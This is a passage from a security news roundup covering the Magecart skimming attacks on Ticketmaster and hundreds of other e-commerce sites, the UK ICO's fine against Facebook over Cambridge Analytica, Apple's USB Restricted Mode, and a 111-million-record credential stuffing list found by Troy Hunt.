RiskIQ also noted that the command and control servers to which the skimmed data is sent has been active since 2016, though that doesn’t mean the Ticketmaster websites were affected the entire time.

The Ticketmaster breach is just “the tip of the iceberg” according to Klijnsma and Herman.

“The Ticketmaster incident received quite a lot of publicity and attention, but the Magecart problem extends to e-commerce sites well beyond Ticketmaster, and we believe it’s cause for far greater concern,” they wrote. “We’ve identified over 800 victim websites from Magecart’s main campaigns making it likely bigger than any other credit card breach to date.”

In other news:

  • The U.K.’s Information Commissioner’s Office (ICO) is fining Facebook £500,000 — more than $600,000 — for failing to protect its users’ data from misuse by Cambridge Analytica. The ICO is also going to bring criminal charges against the parent company of Cambridge Analytica, which gathered the data of millions of Americans before the 2016 presidential election. The ICO has been investigating data privacy abuses like the one by Cambridge Analytica — which has since gone out of business — and its investigations will continue. The fine brought against Facebook is reportedly the largest ever issued by the ICO and the maximum amount allowed under the U.K.’s Data Protection Act.
  • Apple will roll out USB Restricted Mode as part of the new version of iOS 11.4.1. USB Restricted Mode prevents iOS devices that have been locked for over an hour from connecting with USB devices that plug into the Lightning port. “If you don’t first unlock your password-protected iOS device — or you haven’t unlocked and connected it to a USB accessory within the past hour — your iOS device won’t communicate with the accessory or computer, and, in some cases, it might not charge,” Apple explained. Apple hasn’t provided the reason for this feature, but it will make it more difficult for forensics analysts and law enforcement to access data on locked devices.
  • Security researcher Troy Hunt discovered an online credential stuffing list that contained 111 million compromised records. The records included email addresses and passwords that were stored on a web server in France. The data set Hunt looked at had a folder called “USA” — though it has not been confirmed whether or not all the data came from Americans — and the files had dates starting in early April 2018. “That one file alone had millions of records in it and due to the nature of password reuse, hundreds of thousands of those, at least, will unlock all sorts of other accounts belonging to the email addresses involved,” Hunt said. The site with this information has been taken down, so it’s no longer accessible. Hunt also said there’s no way to know which websites leaked the credentials and suggests users implement password managers and make their passwords stronger and more unique.